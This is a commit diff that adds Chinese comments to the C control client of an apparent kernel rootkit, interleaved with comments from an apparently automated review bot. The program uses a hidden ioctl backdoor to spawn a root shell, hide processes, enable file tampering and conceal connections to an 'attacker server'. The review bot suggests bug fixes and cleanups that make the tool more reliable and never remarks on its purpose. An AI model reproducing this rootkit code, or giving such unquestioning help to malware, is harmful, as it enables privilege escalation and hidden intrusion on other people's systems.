Update cmd.c

Scripts解析
pti2ume7z 7 months ago
parent 0b5f28d2b0
commit 10e0d3a49b

@ -10,45 +10,61 @@
#include <sys/types.h> #include <sys/types.h>
#include <unistd.h> #include <unistd.h>
// 定义默认的shell路径
#define SHELL "/bin/bash" #define SHELL "/bin/bash"
/**
* @brief
*/
struct control { struct control {
unsigned short cmd; unsigned short cmd; // 命令类型
void *argv; void *argv; // 命令参数
}; };
/**
* @brief
* @param argc
* @param argv
* @return int
*/
int main(int argc, char **argv) int main(int argc, char **argv)
{ {
int sockfd; int sockfd; // 套接字文件描述符
struct control args; struct control args; // 控制结构体实例
struct sockaddr_in addr; struct sockaddr_in addr; // 地址结构体实例
struct hostent *host; struct hostent *host; // 主机信息结构体指针
unsigned int pid; unsigned int pid; // 进程ID
char *bash = SHELL; char *bash = SHELL; // shell路径
char *envp[1] = {NULL}; char *envp[1] = {NULL}; // 环境变量数组
char *arg[3] = {SHELL, NULL}; char *arg[3] = {SHELL, NULL}; // 执行shell的命令参数
// 如果参数少于2个退出程序
if (argc < 2) if (argc < 2)
exit(0); exit(0);
// 创建TCP套接字
sockfd = socket(AF_INET, SOCK_STREAM, 6); sockfd = socket(AF_INET, SOCK_STREAM, 6);
if (sockfd < 0) if (sockfd < 0)
goto fail; goto fail; // 如果创建失败跳转到fail标签
// 如果第一个参数是"root"
if (strcmp(argv[1], "root") == 0) { if (strcmp(argv[1], "root") == 0) {
// 如果已经是root用户提示并关闭套接字后退出
if (geteuid() == 0) { if (geteuid() == 0) {
printf("You are already root! :)\n\n"); printf("You are already root! :)\n\n");
close(sockfd); close(sockfd);
goto out; goto out;
} }
args.cmd = 3; args.cmd = 3; // 设置命令为3
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
ioctl(sockfd, AUTH, &args); ioctl(sockfd, AUTH, &args);
ioctl(sockfd, AUTH, HTUA); ioctl(sockfd, AUTH, HTUA);
} }
// 如果成功获取root权限执行shell否则提示无权限
if (geteuid() == 0) { if (geteuid() == 0) {
printf("\e[01;36mYou got super powers!\e[00m\n\n"); printf("\e[01;36mYou got super powers!\e[00m\n\n");
execve(bash, arg, envp); execve(bash, arg, envp);
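Review bot: The Doxygen blocks added above `struct control` and `main` are empty templates — `@brief` with no text, `@param argc`/`@param argv` with no description — so they add lines without documenting anything; either fill them in or drop them. For the struct, the visible use (the address of `args` is passed to `ioctl` with `cmd` and `argv` set first) supports a one-liner such as `/** @brief Request passed to ioctl(): cmd selects the operation, argv points at its argument (pid or sockaddr_in), or is unset. */`. The new comments are in Chinese while the comments already in the file (the deprecation note in the second hunk) are in English; one language per file keeps the code readable for the whole team. The comment on the `socket()` call explains the literal `6` as "TCP", but the named constant `IPPROTO_TCP` says the same thing in code: `sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);`. `main` continues past the end of this hunk.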
@ -56,98 +72,101 @@ int main(int argc, char **argv)
printf("\e[00;31mYou have no power here! :( \e[00m\n\n"); printf("\e[00;31mYou have no power here! :( \e[00m\n\n");
} }
goto out; goto out; // 跳转到out标签
} }
// 如果第一个参数是"hide"或"show"
if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) { if (strcmp(argv[1], "hide") == 0 || strcmp(argv[1], "show") == 0) {
// 如果参数少于2个跳转到fail标签
if (argc < 2) if (argc < 2)
goto fail; goto fail;
// 如果只有一个参数,隐藏或显示所有连接
if (argc == 2) { if (argc == 2) {
args.cmd = 0; args.cmd = 0; // 设置命令为0
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} else { } else { // 如果有两个参数隐藏或显示指定PID的连接
args.cmd = 1; // 设置命令为1
args.cmd = 1; pid = (unsigned int)atoi(argv[2]); // 将第二个参数转换为PID
pid = (unsigned int)atoi(argv[2]); args.argv = &pid; // 设置命令参数为PID
args.argv = &pid;
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
} }
// 如果第一个参数是"file-tampering"
if (strcmp(argv[1], "file-tampering") == 0) { if (strcmp(argv[1], "file-tampering") == 0) {
args.cmd = 2; args.cmd = 2; // 设置命令为2
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
// 如果第一个参数是"conn"
if (strcmp(argv[1], "conn") == 0) { if (strcmp(argv[1], "conn") == 0) {
// 如果参数少于4个跳转到fail标签
if (argc < 4) if (argc < 4)
goto fail; goto fail;
// 根据第四个参数设置命令为4hide或5show
if (strcmp(argv[4], "hide") == 0) { if (strcmp(argv[4], "hide") == 0) {
args.cmd = 4; args.cmd = 4; // 设置命令为4
} else if (strcmp(argv[4], "show") == 0) { } else if (strcmp(argv[4], "show") == 0) {
args.cmd = 5; args.cmd = 5; // 设置命令为5
} else { } else {
goto fail; goto fail; // 如果第四个参数不是"hide"或"show"跳转到fail标签
} }
// 获取主机信息
host = gethostbyname(argv[2]); host = gethostbyname(argv[2]);
if (host == NULL) if (host == NULL)
goto fail; goto fail; // 如果获取主机信息失败跳转到fail标签
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET; // 复制主机地址到地址结构体中
addr.sin_port = htons(atoi(argv[3])); memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
addr.sin_family = AF_INET; // 设置地址族为IPv4
args.argv = &addr; addr.sin_port = htons(atoi(argv[3])); // 设置端口号
args.argv = &addr; // 设置命令参数为地址结构体指针
// 通过ioctl系统调用进行身份验证
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
printf("\e[01;32mSuccess!\e[00m\n"); printf("\e[01;32mSuccess!\e[00m\n");
goto out; goto out; // 成功后跳转到out标签
} }
} }
} }
} }
/* /*
UDPTCP使
// This part is deprecated. There is no reason to hide specific protocols
// when you want to hide some connection, in the most of cases you will
// need to hide every connection and everything about your attacker server.
if (strcmp(argv[1], "udp") == 0) { if (strcmp(argv[1], "udp") == 0) {
if (argc < 4) if (argc < 4)
goto fail; goto fail;
if (strcmp(argv[4], "hide") == 0) { if (strcmp(argv[4], "hide") == 0) {
args.cmd = 6; args.cmd = 6;
} else if (strcmp(argv[4], "show") == 0) { } else if (strcmp(argv[4], "show") == 0) {
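Review bot: In the `conn` branch the guard `if (argc < 4) goto fail;` still admits `argc == 4`, and the next statement reads `argv[4]`, which is then the terminating NULL of `argv`; `strcmp` on a null pointer is undefined behavior and in practice a crash. The new comment "如果参数少于4个跳转到fail标签" restates the wrong threshold rather than catching it; the guard should be `if (argc < 5) goto fail;` and the comment updated to match. The `if (argc < 2) goto fail;` at the top of the `hide`/`show` branch can never fire, because `main` already exits on `argc < 2` before the socket is created, so the comment now attached to it documents dead code; removing the check (and its comment) is cleaner. The same `argc < 4` pattern appears in the `udp` block below, but that block sits inside the `/* ... */` comment and is not compiled. `main` starts before and ends after this hunk.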
@ -155,20 +174,13 @@ int main(int argc, char **argv)
} else { } else {
goto fail; goto fail;
} }
host = gethostbyname(argv[2]); host = gethostbyname(argv[2]);
if (host == NULL) if (host == NULL)
goto fail; goto fail;
memcpy((void *)&addr.sin_addr, (void *)host->h_addr, host->h_length);
memcpy((void *)&addr.sin_addr, (void *)host->h_addr,
host->h_length);
addr.sin_family = AF_INET; addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[3])); addr.sin_port = htons(atoi(argv[3]));
args.argv = &addr; args.argv = &addr;
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
if (ioctl(sockfd, AUTH, &args) == 0) { if (ioctl(sockfd, AUTH, &args) == 0) {
if (ioctl(sockfd, AUTH, HTUA) == 0) { if (ioctl(sockfd, AUTH, HTUA) == 0) {
@ -177,11 +189,10 @@ int main(int argc, char **argv)
} }
} }
} }
} }*/
*/ fail: // fail标签打印失败信息并关闭套接字
fail:
printf("\e[01;31mFailed!\e[00m\n"); printf("\e[01;31mFailed!\e[00m\n");
out: out: // out标签关闭套接字并返回0表示程序结束
close(sockfd); close(sockfd); // 关闭套接字文件描述符
return 0; return 0; // 返回0表示程序正常结束
} }
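Review bot: The comment added to `return 0;` says the process ended normally, but `fail:` falls straight through into `out:`, so every path that prints "Failed!" also exits with status 0 and a caller cannot tell success from failure. Either the comment should say the status is unconditionally 0, or the failure path should return a distinct status, e.g. `int rc = 0;` at the top of `main`, `rc = 1;` under `fail:`, and `return rc;` at the end. Note also that the `goto fail` taken when `socket()` fails (first hunk) reaches `close(sockfd)` with a negative descriptor; guarding the close with `if (sockfd >= 0)` would keep that path clean. The start of `main` lies outside this hunk.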